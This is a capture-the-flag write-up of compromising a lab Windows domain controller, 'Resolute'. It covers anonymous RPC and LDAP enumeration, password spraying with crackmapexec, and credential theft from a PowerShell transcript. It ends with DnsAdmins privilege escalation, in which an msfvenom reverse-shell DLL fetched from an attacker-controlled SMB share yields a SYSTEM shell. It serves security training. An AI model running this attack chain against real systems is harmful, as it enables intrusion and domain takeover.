Enumeration

Full nmap scan

nmap -A -p- -o nmap.all.tcp 10.10.10.169
Copy
  • A - enable OS, version and script detection (-sV, -sC, -O)
  • p- - test all ports
...

PORT      STATE SERVICE      VERSION
53/tcp    open  tcpwrapped
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-18 12:10:06Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49709/tcp open  msrpc        Microsoft Windows RPC
54295/tcp open  tcpwrapped

...
Copy

Due to a poorly configured rpc, we can use rpcclient to connect to the machine using a blank username

rpcclient 10.10.10.169 -U ""
rpcclient $>
Copy
  • U - username

We can then run “enumdomusers” to enumerate the users

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
Copy

Using ldapsearch I was able to enumerate users and grep for passwords

ldapsearch -h 10.10.10.169 -x -b "DC=megabank,DC=local" '(objectClass=person)'| grep -i pass
Copy
  • h - host
  • x - Simple Authentication
  • b - base dn for search

We can then pipe that into grep

...

badPasswordTime: 0
description: Account created. Password set to Welcome123!
badPasswordTime: 132345217418993102
badPasswordTime: 0

...
Copy

Ldapsearch can also be used to enumerate usernames

ldapsearch -h 10.10.10.169 -x -b "DC=megabank,DC=local" '(objectClass=person)'| grep -i sAMAccountName
Copy

We can then pipe that into grep

sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: RESOLUTE$
sAMAccountName: MS02$
sAMAccountName: ryan
sAMAccountName: marko
sAMAccountName: sunita
sAMAccountName: abigail
sAMAccountName: marcus
sAMAccountName: sally
sAMAccountName: fred
sAMAccountName: angela
sAMAccountName: felicia
sAMAccountName: gustavo
sAMAccountName: ulf
sAMAccountName: stevie
sAMAccountName: claire
sAMAccountName: paulo
sAMAccountName: steve
sAMAccountName: annette
sAMAccountName: annika
sAMAccountName: per
sAMAccountName: claude
sAMAccountName: melanie
sAMAccountName: zach
sAMAccountName: simon
sAMAccountName: naoki
Copy

Generate a file with that list of users

cat users
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
Copy

Use crackmapexec to test the accounts found in using rpcclient or ldapsearch with the password of “Welcome123!”

crackmapexec smb 10.10.10.169 -u users -p Welcome123!
Copy

We get output

...

SMB         10.10.10.169    445    RESOLUTE         [-] MEGABANK\claude:Welcome123! STATUS_LOGON_FAILURE
SMB         10.10.10.169    445    RESOLUTE         [+] MEGABANK\melanie:Welcome123!
Copy

Initial Foothold

Now we have the assumed credentials of user “melanie” which we can use to authenticate to the server using winrm

We can use the credentials with the evil-winrm tool (https://github.com/Hackplayers/evil-winrm)

evil-winrm -u melanie -p Welcome123! -i 10.10.10.169
Copy

With this we get a shell!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie> whoami
megabank\melanie
Copy

And we can grab the user flag

*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
87a[REDACTED]
Copy

Privilege Escalation 1

Enumerate the users on the box

*Evil-WinRM* PS C:\Users\melanie\Desktop> net user

User accounts for \\

-------------------------------------------------------------------------------
abigail                  Administrator            angela
annette                  annika                   claire
claude                   DefaultAccount           felicia
fred                     Guest                    gustavo
krbtgt                   marcus                   marko
melanie                  naoki                    paulo
per                      ryan                     sally
simon                    steve                    stevie
sunita                   ulf                      zach
The command completed with one or more errors.
Copy

We can also see what users have logged onto the machine

*Evil-WinRM* PS C:\Users> ls

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        9/27/2019   7:05 AM                ryan
Copy

Viewing our group permissions we can see we don’t have any access to anything special

*Evil-WinRM* PS C:\Users> net user melanie
User name                    melanie
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/21/2020 5:39:04 AM
Password expires             Never
Password changeable          5/22/2020 5:39:04 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
Copy

Looking for hidden files in the C: drive we can find a PSTranscripts folder

*Evil-WinRM* PS C:\> ls -h

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/20/2020   9:26 PM      402653184 pagefile.sys
Copy

After going into a few more hidden folders we find a PowerShell Transcript file (PowerShell Transcript files record all the activities in the PowerShell console to a text file)

*Evil-WinRM* PS C:\PStranscripts\20191203> ls -h

    Directory: C:\PStranscripts\20191203

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Copy

In this text file we find credentials for a “ryan” user

...

PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

...
Copy

We can now login using evil-winrm with ryan

evil-winrm -u ryan -p Serv3r4Admin4cc123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents>
Copy

We don’t find a flag but we do find this note

*Evil-WinRM* PS C:\Users\ryan\Desktop> cat note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
Copy

Running whoami /all as ryan tells us that we’re apart of the DNSAdmins group

C:\Users\ryan\Documents> whoami /all
...

MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

...
Copy

Searching about DNSAdmin, I found this privesc post - https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2

Constructing the msfvenom payload

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.51 LPORT=4444 -f dll > privesc.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes
Copy

We can then host this using impacket-smbserver

impacket-smbserver exploit ./
Copy

You can test the server by using net view

net view \\10.10.14.51\exploit
net.exe : The Server service is not started.
    + CategoryInfo          : NotSpecified: (The Server service is not started.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

More help is available by typing NET HELPMSG 2114.
Copy

But you may get this error, as long as you see the incoming connection on your smbserver, it all works

[*] Incoming connection (10.10.10.169,50789)
[*] AUTHENTICATE_MESSAGE (\,RESOLUTE)
[*] User RESOLUTE\ authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:EXPLOIT)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.169,50789)
[*] Remaining connections []
Copy

Set up your netcat listener

nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Copy

Now the next few steps involve you to have quick hands as the settings are reset every minute, the easiest way I found was to have already typed all the commands and just use the arrow keys to go through your history to get through them quickly

Run the dnscmd (don’t be worried if you don’t see anything contact your smbserver, it’s not meant to until you restart dns)

dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.14.51\exploit\privesc.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.
Copy

Check that the dll has appeared in the registry

Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

ServerLevelPluginDll : \\10.10.14.58\SHARE\exploit.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry
Copy

Stop and start dns

sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 576
        FLAGS              :
Copy

We should now see something connect to the smbserver and recieve a reverse shell on the listener

Ncat: Connection from 10.10.10.169.
Ncat: Connection from 10.10.10.169:50748.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
Copy

And we’ve got a shell!

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d[REDACTED]
Copy